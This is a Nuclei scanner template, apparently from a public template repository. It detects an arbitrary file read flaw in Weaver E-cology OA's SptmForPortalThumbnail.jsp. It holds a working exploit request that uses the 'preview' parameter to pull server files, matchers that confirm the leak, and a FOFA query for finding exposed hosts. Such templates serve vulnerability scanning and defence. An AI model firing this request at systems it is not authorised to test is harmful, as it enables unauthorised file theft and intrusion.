nuclei-templates/http/vulnerabilities/weaver/weaver-sptmforportalthumbna...

46 lines
1.4 KiB
YAML
Executable File

id: weaver-sptmforportalthumbnail-lfi
info:
name: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read
author: SleepingBag945
severity: high
description: |
The controllable preview parameters of SptmForPortalThumbnail.jsp are not filtered and are directly spliced to the web root directory for file downloading.
reference:
- http://124.223.89.192/archives/e-cology8-14
- https://github.com/GREENHAT7/pxplan/blob/main/xray_pocs/yaml-poc-weaver-weaver_e_cology_oa-readfile-CT-479157.yml
metadata:
verified: true
max-request: 1
fofa-query: app="泛微-E-Weaver"
product: e-cology
vendor: weaver
tags: weaver,e-cology,oa,lfi
classification:
cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
http:
- method: GET
path:
- "{{BaseURL}}/portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "weaver.general.BaseBean"
- "getServletConfig"
condition: and
- type: word
part: header
words:
- "image/png"
- type: status
status:
- 200
# digest: 4a0a004730450220781ac3c5267b2f1315f8f10652cbfe1c4aaefd5b665e5e33b1b02617218dcce5022100e65c3fce695fe99f73741f270f84b9b53c5400a46d7e6e84908dfcd5180ea22d:922c64590222798bb761d5b6d8e72950